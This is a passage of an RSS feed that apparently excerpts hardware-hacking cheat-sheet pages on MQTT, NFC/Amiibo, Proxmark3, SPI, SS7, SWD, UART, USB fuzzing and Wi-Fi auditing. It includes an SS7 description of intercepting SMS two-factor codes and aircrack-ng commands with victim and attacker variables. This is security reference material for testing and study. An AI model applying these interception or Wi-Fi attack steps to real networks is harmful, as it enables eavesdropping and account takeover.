&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="n"&gt;client&lt;/span&gt;&lt;span class="o"&gt;.&lt;/span&gt;&lt;span class="n"&gt;connect&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="s1"&gt;&amp;#39;SERVER IP HERE&amp;#39;&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="mi"&gt;1883&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="mi"&gt;60&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="n"&gt;client&lt;/span&gt;&lt;span class="o"&gt;.&lt;/span&gt;&lt;span class="n"&gt;loop_forever&lt;/span&gt;&lt;span class="p"&gt;()&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;Send MQTT requests&lt;/p&gt;</description></item><item><title>NFC - Amiibo</title><link>https://bokkapig.pages.dev/refs/hardware/protocols/rfid-nfc/ntag215-amiibo/</link><pubDate>Sun, 12 Jul 2026 22:01:52 +0200</pubDate><guid>https://bokkapig.pages.dev/refs/hardware/protocols/rfid-nfc/ntag215-amiibo/</guid><description>&lt;blockquote&gt;
&lt;p&gt;Amiibo are small figurines or cards produced by Nintendo that contain Near Field Communication (NFC) chips. These chips allow the Amiibo to interact with various Nintendo gaming systems, such as the Wii U, Nintendo 3DS, and Nintendo Switch.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;h2 id="tools" class="anchored-heading"&gt;Tools&lt;a class="heading-anchor" href="#tools" aria-label="Permalink to this section"&gt;#&lt;/a&gt;
&lt;/h2&gt;
&lt;ul&gt;
&lt;li&gt;&lt;a href="https://github.com/socram8888/amiitool"&gt;socram8888/amiitool&lt;/a&gt; - Reverse-engineered amiibo cryptography&lt;/li&gt;
&lt;/ul&gt;
&lt;h2 id="amiibo-encryption" class="anchored-heading"&gt;Amiibo Encryption&lt;a class="heading-anchor" href="#amiibo-encryption" aria-label="Permalink to this section"&gt;#&lt;/a&gt;
&lt;/h2&gt;
&lt;p&gt;Nintendo added their own layer of encryption and digital signing to increase security. The digital signing prevents you from blindly altering the game data bytes because then the signature will no longer match. Additionally, the signature is also based on the &lt;strong&gt;UID&lt;/strong&gt; of the tag, so you can&amp;rsquo;t simply copy the bytes from an Amiibo to a blank NTAG215 to clone it.&lt;/p&gt;</description></item><item><title>Proxmark</title><link>https://bokkapig.pages.dev/refs/hardware/gadgets/proxmark/</link><pubDate>Sun, 12 Jul 2026 22:01:52 +0200</pubDate><guid>https://bokkapig.pages.dev/refs/hardware/gadgets/proxmark/</guid><description>&lt;p&gt;Proxmark3 is a powerful tool for RFID research, allowing you to read, write, and clone various types of RFID tags. This cheatsheet provides a quick reference for common Proxmark3 commands and usage.&lt;/p&gt;
&lt;h2 id="table-of-contents" class="anchored-heading"&gt;Table of Contents&lt;a class="heading-anchor" href="#table-of-contents" aria-label="Permalink to this section"&gt;#&lt;/a&gt;
&lt;/h2&gt;
&lt;ol&gt;
&lt;li&gt;&lt;a href="#setup-and-configuration"&gt;Setup and Configuration&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="#basic-commands"&gt;Basic Commands&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="#low-frequency-lf-commands"&gt;Low Frequency (LF) Commands&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="#high-frequency-hf-commands"&gt;High Frequency (HF) Commands&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="#mifare-classic-commands"&gt;Mifare Classic Commands&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="#mifare-ultralight-commands"&gt;Mifare Ultralight Commands&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="#iclass-commands"&gt;iClass Commands&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="#troubleshooting"&gt;Troubleshooting&lt;/a&gt;&lt;/li&gt;
&lt;/ol&gt;
&lt;h2 id="setup-and-configuration" class="anchored-heading"&gt;Setup and Configuration&lt;a class="heading-anchor" href="#setup-and-configuration" aria-label="Permalink to this section"&gt;#&lt;/a&gt;
&lt;/h2&gt;
&lt;h3 id="installation" class="anchored-heading"&gt;Installation&lt;a class="heading-anchor" href="#installation" aria-label="Permalink to this section"&gt;#&lt;/a&gt;
&lt;/h3&gt;
&lt;ol&gt;
&lt;li&gt;
&lt;p&gt;&lt;strong&gt;Clone the Proxmark3 repository:&lt;/strong&gt;&lt;/p&gt;</description></item><item><title>Pwnagotchi</title><link>https://bokkapig.pages.dev/refs/hardware/gadgets/pwnagotchi/</link><pubDate>Sun, 12 Jul 2026 22:01:52 +0200</pubDate><guid>https://bokkapig.pages.dev/refs/hardware/gadgets/pwnagotchi/</guid><description>&lt;p&gt;Documentation: &lt;a href="https://pwnagotchi.ai/"&gt;https://pwnagotchi.ai/&lt;/a&gt;&lt;/p&gt;
&lt;figure class="writeup-figure"&gt;
 &lt;img src="https://bokkapig.pages.dev/refs/hardware/assets/image-pwnagotchi.png" alt="Pwnagotchi" width="1000" height="563" loading="lazy" decoding="async"&gt;&lt;figcaption&gt;Pwnagotchi&lt;/figcaption&gt;&lt;/figure&gt;</description></item><item><title>Raspberry Pi</title><link>https://bokkapig.pages.dev/refs/hardware/gadgets/raspberry-pi/</link><pubDate>Sun, 12 Jul 2026 22:01:52 +0200</pubDate><guid>https://bokkapig.pages.dev/refs/hardware/gadgets/raspberry-pi/</guid><description>&lt;h2 id="gpio-header" class="anchored-heading"&gt;GPIO Header&lt;a class="heading-anchor" href="#gpio-header" aria-label="Permalink to this section"&gt;#&lt;/a&gt;
&lt;/h2&gt;
&lt;figure class="writeup-figure"&gt;
 &lt;img src="https://bokkapig.pages.dev/refs/hardware/assets/rpi-gpio.png" alt="Raspberry PI GPIO Header" width="920" height="960" loading="lazy" decoding="async"&gt;&lt;figcaption&gt;Raspberry PI GPIO Header&lt;/figcaption&gt;&lt;/figure&gt;&lt;h2 id="tools" class="anchored-heading"&gt;Tools&lt;a class="heading-anchor" href="#tools" aria-label="Permalink to this section"&gt;#&lt;/a&gt;
&lt;/h2&gt;
&lt;ul&gt;
&lt;li&gt;&lt;a href="https://github.com/arunmagesh/raspi-sec-tool"&gt;raspi-sec-tool&lt;/a&gt; - using Raspberry pi as hacking tool&lt;/li&gt;
&lt;/ul&gt;
&lt;h2 id="references" class="anchored-heading"&gt;References&lt;a class="heading-anchor" href="#references" aria-label="Permalink to this section"&gt;#&lt;/a&gt;
&lt;/h2&gt;
&lt;ul&gt;
&lt;li&gt;&lt;a href="https://payatu.com/using-rasberrypi-as-poor-mans-hardware-hacking-tool"&gt;Raspberry Pi As Poor Man’s Hardware Hacking Tool - Arun-Magesh - December 14, 2018&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://voidstarsec.com/blog/pifex-config"&gt;Hardware Hacking with a Raspberry Pi - Configuring the PiFex - voidstarsec - JULY 2024&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;</description></item><item><title>SDR</title><link>https://bokkapig.pages.dev/refs/hardware/radio-frequency/sdr/</link><pubDate>Sun, 12 Jul 2026 22:01:52 +0200</pubDate><guid>https://bokkapig.pages.dev/refs/hardware/radio-frequency/sdr/</guid><description>&lt;h2 id="tools" class="anchored-heading"&gt;Tools&lt;a class="heading-anchor" href="#tools" aria-label="Permalink to this section"&gt;#&lt;/a&gt;
&lt;/h2&gt;
&lt;p&gt;&lt;a href="https://github.com/ainfosec/FISSURE"&gt;ainfosec/FISSURE&lt;/a&gt; - The RF and reverse engineering framework for everyone.&lt;/p&gt;</description></item><item><title>SPI - Serial Peripheral Interface</title><link>https://bokkapig.pages.dev/refs/hardware/protocols/spi/</link><pubDate>Sun, 12 Jul 2026 22:01:52 +0200</pubDate><guid>https://bokkapig.pages.dev/refs/hardware/protocols/spi/</guid><description>&lt;p&gt;Serial Peripheral Interface (SPI), is a type of communication protocol used primarily in microcontroller-based systems
The controller selects a chip it send and receive information to and from. NOR flash chips with an SPI interface are commonly used as firmware boot chip. SPI has one read and one write line. In QSPI mode, 4 lines are used in parallel.&lt;/p&gt;
&lt;p&gt;SPI mainly involves four lines or wires:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;MOSI (Master Out Slave In): This is the line through which the master sends data to the slave.&lt;/li&gt;
&lt;li&gt;MISO (Master In Slave Out): Through this line, the slave sends data back to the master.&lt;/li&gt;
&lt;li&gt;SCLK (Serial Clock): This line is like a clock ticking, controlled by the master. It helps in timing the data transfer, ensuring both master and slave are synchronized.&lt;/li&gt;
&lt;li&gt;SS (Slave Select)/CS (Chip Select): When the master wants to talk to a particular slave, it uses this line to select the slave.&lt;/li&gt;
&lt;/ul&gt;
&lt;h2 id="interact-via-spi" class="anchored-heading"&gt;Interact via SPI&lt;a class="heading-anchor" href="#interact-via-spi" aria-label="Permalink to this section"&gt;#&lt;/a&gt;
&lt;/h2&gt;
&lt;figure class="writeup-figure"&gt;
 &lt;img src="https://bokkapig.pages.dev/refs/hardware/assets/hydra-spi.png" alt="HydraBus SPI" width="1174" height="705" loading="lazy" decoding="async"&gt;&lt;figcaption&gt;HydraBus SPI&lt;/figcaption&gt;&lt;/figure&gt;&lt;ul&gt;
&lt;li&gt;
&lt;p&gt;Connect to HydraBus and communicate via the SPI protocol&lt;/p&gt;</description></item><item><title>SS7 - Signaling System No. 7</title><link>https://bokkapig.pages.dev/refs/hardware/protocols/signaling-system-7/</link><pubDate>Sun, 12 Jul 2026 22:01:52 +0200</pubDate><guid>https://bokkapig.pages.dev/refs/hardware/protocols/signaling-system-7/</guid><description>&lt;h2 id="tools" class="anchored-heading"&gt;Tools&lt;a class="heading-anchor" href="#tools" aria-label="Permalink to this section"&gt;#&lt;/a&gt;
&lt;/h2&gt;
&lt;ul&gt;
&lt;li&gt;&lt;a href="https://github.com/P1sec/SigFW"&gt;P1sec/SigFW&lt;/a&gt; - Open Source Signaling Firewall for SS7, Diameter filtering, antispoof and antisniff&lt;/li&gt;
&lt;li&gt;&lt;a href="https://github.com/0xc0decafe/ss7MAPer"&gt;0xc0decafe/ss7MAPer&lt;/a&gt; - SS7 MAP (pen-)testing toolkit&lt;/li&gt;
&lt;li&gt;&lt;a href="https://github.com/SigPloiter/SigPloit"&gt;SigPloiter/SigPloit&lt;/a&gt; - SigPloit: Telecom Signaling Exploitation Framework - SS7, GTP, Diameter &amp;amp; SIP&lt;/li&gt;
&lt;/ul&gt;
&lt;h2 id="sms-2fa-interception" class="anchored-heading"&gt;SMS 2FA Interception&lt;a class="heading-anchor" href="#sms-2fa-interception" aria-label="Permalink to this section"&gt;#&lt;/a&gt;
&lt;/h2&gt;
&lt;p&gt;SS7 plays a part in the transportation of SMS messages. An attacker may be able to register a victims &lt;code&gt;MSISDN&lt;/code&gt; (mobile number) on a fake &lt;code&gt;MSC&lt;/code&gt; (Mobile Switching Centre), the victims operator&amp;rsquo;s &lt;code&gt;HLR&lt;/code&gt; (Home Location Register) that works as a kind of telephone directory for &lt;code&gt;MSISDNs&lt;/code&gt;, operators and SMS service centres (&lt;code&gt;SMSC&lt;/code&gt;) will set the new location for the Victim’s &lt;code&gt;MSISDN&lt;/code&gt;.&lt;/p&gt;</description></item><item><title>SWD</title><link>https://bokkapig.pages.dev/refs/hardware/debug-interfaces/swd/</link><pubDate>Sun, 12 Jul 2026 22:01:52 +0200</pubDate><guid>https://bokkapig.pages.dev/refs/hardware/debug-interfaces/swd/</guid><description>&lt;h2 id="summary" class="anchored-heading"&gt;Summary&lt;a class="heading-anchor" href="#summary" aria-label="Permalink to this section"&gt;#&lt;/a&gt;
&lt;/h2&gt;
&lt;ul&gt;
&lt;li&gt;SWD Pins&lt;/li&gt;
&lt;/ul&gt;
&lt;h2 id="swd-pins" class="anchored-heading"&gt;SWD pins&lt;a class="heading-anchor" href="#swd-pins" aria-label="Permalink to this section"&gt;#&lt;/a&gt;
&lt;/h2&gt;
&lt;ul&gt;
&lt;li&gt;SWCLK: Clock into the core&lt;/li&gt;
&lt;li&gt;SWDIO: Data in / out&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;JTAG and SWD are similar and can be interfaced with each other:&lt;/p&gt;
&lt;table&gt;
 &lt;thead&gt;
 &lt;tr&gt;
 &lt;th&gt;JTAG Mode&lt;/th&gt;
 &lt;th&gt;SWD Mode&lt;/th&gt;
 &lt;th&gt;Signal&lt;/th&gt;
 &lt;/tr&gt;
 &lt;/thead&gt;
 &lt;tbody&gt;
 &lt;tr&gt;
 &lt;td&gt;TCK&lt;/td&gt;
 &lt;td&gt;SWCLK&lt;/td&gt;
 &lt;td&gt;Clock into the core&lt;/td&gt;
 &lt;/tr&gt;
 &lt;tr&gt;
 &lt;td&gt;TDI&lt;/td&gt;
 &lt;td&gt;-&lt;/td&gt;
 &lt;td&gt;JTAG test data input&lt;/td&gt;
 &lt;/tr&gt;
 &lt;tr&gt;
 &lt;td&gt;TDO&lt;/td&gt;
 &lt;td&gt;SWV&lt;/td&gt;
 &lt;td&gt;JTAG Test data output / SWV trace data output&lt;/td&gt;
 &lt;/tr&gt;
 &lt;tr&gt;
 &lt;td&gt;TMS&lt;/td&gt;
 &lt;td&gt;SWDIO&lt;/td&gt;
 &lt;td&gt;JTAG test mode select / SWD data in and out&lt;/td&gt;
 &lt;/tr&gt;
 &lt;tr&gt;
 &lt;td&gt;GND&lt;/td&gt;
 &lt;td&gt;GND&lt;/td&gt;
 &lt;td&gt;-&lt;/td&gt;
 &lt;/tr&gt;
 &lt;/tbody&gt;
&lt;/table&gt;
&lt;h2 id="references" class="anchored-heading"&gt;References&lt;a class="heading-anchor" href="#references" aria-label="Permalink to this section"&gt;#&lt;/a&gt;
&lt;/h2&gt;
&lt;ul&gt;
&lt;li&gt;&lt;a href="https://wrongbaud.github.io/posts/stm-xbox-jtag/"&gt;Hardware Debugging for Reverse Engineers Part 1: SWD, OpenOCD and Xbox One Controllers - Posted Jan 30, 2020 by wrongbaud&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;</description></item><item><title>UART</title><link>https://bokkapig.pages.dev/refs/hardware/debug-interfaces/uart/</link><pubDate>Sun, 12 Jul 2026 22:01:52 +0200</pubDate><guid>https://bokkapig.pages.dev/refs/hardware/debug-interfaces/uart/</guid><description>&lt;h2 id="what-is-it" class="anchored-heading"&gt;What is it?&lt;a class="heading-anchor" href="#what-is-it" aria-label="Permalink to this section"&gt;#&lt;/a&gt;
&lt;/h2&gt;
&lt;p&gt;UART stands for Universal asynchronous receiver transmitter. Used for serial communications over a computer or peripheral device serial port.&lt;/p&gt;
&lt;p&gt;UART peripherals are commonly integrated into many embedded devices. UART communication makes use of baud rate to maintain synchronism between two devices. The baud rate is the rate at which information is transferred in a communication channel.&lt;/p&gt;
&lt;p&gt;With access to the UART, a user can see the bootloader and operating system logs.&lt;/p&gt;</description></item><item><title>UPnP - Universal Plug and Play</title><link>https://bokkapig.pages.dev/refs/hardware/protocols/upnp/</link><pubDate>Sun, 12 Jul 2026 22:01:52 +0200</pubDate><guid>https://bokkapig.pages.dev/refs/hardware/protocols/upnp/</guid><description>&lt;p&gt;TODO&lt;/p&gt;</description></item><item><title>USB - Universal Serial Bus</title><link>https://bokkapig.pages.dev/refs/hardware/protocols/usb/</link><pubDate>Sun, 12 Jul 2026 22:01:52 +0200</pubDate><guid>https://bokkapig.pages.dev/refs/hardware/protocols/usb/</guid><description>&lt;h2 id="usb-type-2" class="anchored-heading"&gt;USB Type 2&lt;a class="heading-anchor" href="#usb-type-2" aria-label="Permalink to this section"&gt;#&lt;/a&gt;
&lt;/h2&gt;
&lt;h2 id="usb-type-3" class="anchored-heading"&gt;USB Type 3&lt;a class="heading-anchor" href="#usb-type-3" aria-label="Permalink to this section"&gt;#&lt;/a&gt;
&lt;/h2&gt;
&lt;h2 id="usb-type-c" class="anchored-heading"&gt;USB Type C&lt;a class="heading-anchor" href="#usb-type-c" aria-label="Permalink to this section"&gt;#&lt;/a&gt;
&lt;/h2&gt;
&lt;h2 id="fuzzing" class="anchored-heading"&gt;Fuzzing&lt;a class="heading-anchor" href="#fuzzing" aria-label="Permalink to this section"&gt;#&lt;/a&gt;
&lt;/h2&gt;
&lt;ul&gt;
&lt;li&gt;&lt;a href="https://hydrabus.com/hydrausb3-v1-0-specifications"&gt;HydraBus/HydraUSB3&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://goodfet.sourceforge.net/hardware/facedancer21/"&gt;goodfet/Facedancer21&lt;/a&gt; - The purpose of this board is to allow USB devices to be written in host-side Python, so that one workstation can fuzz-test the USB device drivers of another host.&lt;/li&gt;
&lt;/ul&gt;
&lt;h2 id="references" class="anchored-heading"&gt;References&lt;a class="heading-anchor" href="#references" aria-label="Permalink to this section"&gt;#&lt;/a&gt;
&lt;/h2&gt;
&lt;ul&gt;
&lt;li&gt;&lt;a href="https://hydrabus.com/hydrausb3-v1-0-specifications"&gt;HydraUSB3 v1.0 Specifications&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://youtu.be/4uHg6toV69k"&gt;Nullcon Goa 2023 | Cracking With Automated USB Fuzz - Subba Bachina &amp;amp; Conna - 31 dec. 2023&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://trustedsec.com/blog/hands-on-with-chip-off-non-volatile-memory"&gt;Hands On with Chip Off Non-Volatile Memory - Philip DuBois - June 11, 2024&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;</description></item><item><title>Wifi - Additional Tricks and Tools</title><link>https://bokkapig.pages.dev/refs/hardware/protocols/wifi/wifi-other/</link><pubDate>Sun, 12 Jul 2026 22:01:52 +0200</pubDate><guid>https://bokkapig.pages.dev/refs/hardware/protocols/wifi/wifi-other/</guid><description>&lt;h2 id="additional-aircrack-ng-tools" class="anchored-heading"&gt;Additional Aircrack-NG Tools&lt;a class="heading-anchor" href="#additional-aircrack-ng-tools" aria-label="Permalink to this section"&gt;#&lt;/a&gt;
&lt;/h2&gt;
&lt;h3 id="remove-wireless-headers" class="anchored-heading"&gt;Remove Wireless Headers&lt;a class="heading-anchor" href="#remove-wireless-headers" aria-label="Permalink to this section"&gt;#&lt;/a&gt;
&lt;/h3&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" class="chroma"&gt;&lt;code class="language-powershell" data-lang="powershell"&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="nb"&gt;airdecap-ng&lt;/span&gt; &lt;span class="n"&gt;-b&lt;/span&gt; &lt;span class="nv"&gt;$AP_MAC&lt;/span&gt; &lt;span class="nb"&gt;open-network&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="py"&gt;cap&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="p"&gt;*&lt;/span&gt; &lt;span class="n"&gt;-dec&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="n"&gt;cap&lt;/span&gt;&lt;span class="err"&gt;:&lt;/span&gt; &lt;span class="n"&gt;stripped&lt;/span&gt; &lt;span class="n"&gt;version&lt;/span&gt; &lt;span class="n"&gt;of&lt;/span&gt; &lt;span class="n"&gt;the&lt;/span&gt; &lt;span class="n"&gt;file&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;h3 id="decrypt-a-wep-encrypted-capture-file" class="anchored-heading"&gt;Decrypt a WEP encrypted capture file&lt;a class="heading-anchor" href="#decrypt-a-wep-encrypted-capture-file" aria-label="Permalink to this section"&gt;#&lt;/a&gt;
&lt;/h3&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" class="chroma"&gt;&lt;code class="language-powershell" data-lang="powershell"&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="nb"&gt;airdecap-ng&lt;/span&gt; &lt;span class="n"&gt;-w&lt;/span&gt; &lt;span class="nv"&gt;$WEP_KEY&lt;/span&gt; &lt;span class="n"&gt;wep&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="py"&gt;cap&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;h3 id="decrypt-a-wpa2-encrypted-capture-file" class="anchored-heading"&gt;Decrypt a WPA2 encrypted capture file&lt;a class="heading-anchor" href="#decrypt-a-wpa2-encrypted-capture-file" aria-label="Permalink to this section"&gt;#&lt;/a&gt;
&lt;/h3&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" class="chroma"&gt;&lt;code class="language-powershell" data-lang="powershell"&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="nb"&gt;airdecap-ng&lt;/span&gt; &lt;span class="n"&gt;-e&lt;/span&gt; &lt;span class="nv"&gt;$AP_SSID&lt;/span&gt; &lt;span class="n"&gt;-p&lt;/span&gt; &lt;span class="nv"&gt;$WPA_PASSWORD&lt;/span&gt; &lt;span class="n"&gt;tkip&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="py"&gt;cap&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;h3 id="remote-aircrack-suite" class="anchored-heading"&gt;Remote Aircrack Suite&lt;a class="heading-anchor" href="#remote-aircrack-suite" aria-label="Permalink to this section"&gt;#&lt;/a&gt;
&lt;/h3&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" class="chroma"&gt;&lt;code class="language-powershell" data-lang="powershell"&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="nb"&gt;airmon-ng&lt;/span&gt; &lt;span class="nb"&gt;start &lt;/span&gt;&lt;span class="n"&gt;wlan0&lt;/span&gt; &lt;span class="mf"&gt;3&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="nb"&gt;airserv-ng&lt;/span&gt; &lt;span class="n"&gt;-p&lt;/span&gt; &lt;span class="mf"&gt;1337&lt;/span&gt; &lt;span class="n"&gt;-c&lt;/span&gt; &lt;span class="mf"&gt;3&lt;/span&gt; &lt;span class="n"&gt;-d&lt;/span&gt; &lt;span class="n"&gt;mon0&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="nb"&gt;airodump-ng&lt;/span&gt; &lt;span class="n"&gt;-c&lt;/span&gt; &lt;span class="mf"&gt;3&lt;/span&gt; &lt;span class="p"&gt;-&lt;/span&gt;&lt;span class="n"&gt;-bssid&lt;/span&gt; &lt;span class="nv"&gt;$AP_MAC&lt;/span&gt; &lt;span class="nv"&gt;$HOST&lt;/span&gt;&lt;span class="err"&gt;:&lt;/span&gt;&lt;span class="nv"&gt;$PORT&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;h3 id="wireless-intrusion-detection-system" class="anchored-heading"&gt;Wireless Intrusion Detection System&lt;a class="heading-anchor" href="#wireless-intrusion-detection-system" aria-label="Permalink to this section"&gt;#&lt;/a&gt;
&lt;/h3&gt;
&lt;blockquote&gt;
&lt;p&gt;Requires wireless key and bssid&lt;/p&gt;
&lt;/blockquote&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" class="chroma"&gt;&lt;code class="language-powershell" data-lang="powershell"&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="nb"&gt;airmon-ng&lt;/span&gt; &lt;span class="nb"&gt;start &lt;/span&gt;&lt;span class="n"&gt;wlan0&lt;/span&gt; &lt;span class="mf"&gt;3&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="c"&gt;# create the at0 interface&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="nb"&gt;airtun-ng&lt;/span&gt; &lt;span class="n"&gt;-a&lt;/span&gt; &lt;span class="nv"&gt;$AP_MAC&lt;/span&gt; &lt;span class="n"&gt;-w&lt;/span&gt; &lt;span class="nv"&gt;$WEP_KEY&lt;/span&gt; &lt;span class="n"&gt;mon0&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="c"&gt;# the interface will auto decrypt packets&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;h2 id="wireless-reconnaissance" class="anchored-heading"&gt;Wireless Reconnaissance&lt;a class="heading-anchor" href="#wireless-reconnaissance" aria-label="Permalink to this section"&gt;#&lt;/a&gt;
&lt;/h2&gt;
&lt;blockquote&gt;
&lt;p&gt;Use CSV file from airodump&lt;/p&gt;</description></item><item><title>Wifi - Basics</title><link>https://bokkapig.pages.dev/refs/hardware/protocols/wifi/wifi-basics/</link><pubDate>Sun, 12 Jul 2026 22:01:52 +0200</pubDate><guid>https://bokkapig.pages.dev/refs/hardware/protocols/wifi/wifi-basics/</guid><description>&lt;h2 id="tools" class="anchored-heading"&gt;Tools&lt;a class="heading-anchor" href="#tools" aria-label="Permalink to this section"&gt;#&lt;/a&gt;
&lt;/h2&gt;
&lt;ul&gt;
&lt;li&gt;&lt;a href="https://github.com/aircrack-ng/aircrack-ng"&gt;aircrack-ng/aircrack-ng&lt;/a&gt; - WiFi security auditing tools suite&lt;/li&gt;
&lt;li&gt;&lt;a href="https://github.com/kimocoder/wifite2"&gt;kimocoder/wifite2&lt;/a&gt; - Fork of wifite2&lt;/li&gt;
&lt;li&gt;&lt;a href="https://github.com/derv82/wifite2"&gt;derv82/wifite2&lt;/a&gt; - Rewrite of the popular wireless network auditor, &amp;ldquo;wifite&amp;rdquo;. Development stopped in 2018.&lt;/li&gt;
&lt;li&gt;&lt;a href="https://github.com/derv82/wifite"&gt;derv82/wifite&lt;/a&gt; - Wifite is an automated wireless attack tool.&lt;/li&gt;
&lt;/ul&gt;
&lt;h2 id="linux-wireless-basics" class="anchored-heading"&gt;Linux Wireless Basics&lt;a class="heading-anchor" href="#linux-wireless-basics" aria-label="Permalink to this section"&gt;#&lt;/a&gt;
&lt;/h2&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" class="chroma"&gt;&lt;code class="language-powershell" data-lang="powershell"&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="n"&gt;AP_MAC&lt;/span&gt;&lt;span class="p"&gt;=&lt;/span&gt;&lt;span class="s2"&gt;&amp;#34;XX:XX:XX:XX:XX&amp;#34;&lt;/span&gt; &lt;span class="c"&gt;# BSSID&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="n"&gt;VICTIM_MAC&lt;/span&gt;&lt;span class="p"&gt;=&lt;/span&gt;&lt;span class="s2"&gt;&amp;#34;XX:XX:XX:XX:XX&amp;#34;&lt;/span&gt; &lt;span class="c"&gt;# VIC&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="n"&gt;ATTACKER_MAC&lt;/span&gt;&lt;span class="p"&gt;=&lt;/span&gt;&lt;span class="s2"&gt;&amp;#34;XX:XX:XX:XX:XX&amp;#34;&lt;/span&gt; &lt;span class="c"&gt;# MON&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="n"&gt;AP_SSID&lt;/span&gt;&lt;span class="p"&gt;=&lt;/span&gt;&lt;span class="s2"&gt;&amp;#34;wifibox&amp;#34;&lt;/span&gt; &lt;span class="c"&gt;# ESSID&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="n"&gt;SRC_ADDR&lt;/span&gt;&lt;span class="p"&gt;=&lt;/span&gt;&lt;span class="s2"&gt;&amp;#34;192.168.1.1&amp;#34;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="n"&gt;DST_ADDR&lt;/span&gt;&lt;span class="p"&gt;=&lt;/span&gt;&lt;span class="s2"&gt;&amp;#34;192.168.1.255&amp;#34;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;div class="highlight"&gt;&lt;pre tabindex="0" class="chroma"&gt;&lt;code class="language-powershell" data-lang="powershell"&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="c"&gt;# driver install&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="n"&gt;apt&lt;/span&gt; &lt;span class="n"&gt;install&lt;/span&gt; &lt;span class="nb"&gt;realtek-rtl88xxau&lt;/span&gt;&lt;span class="n"&gt;-dkms&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;
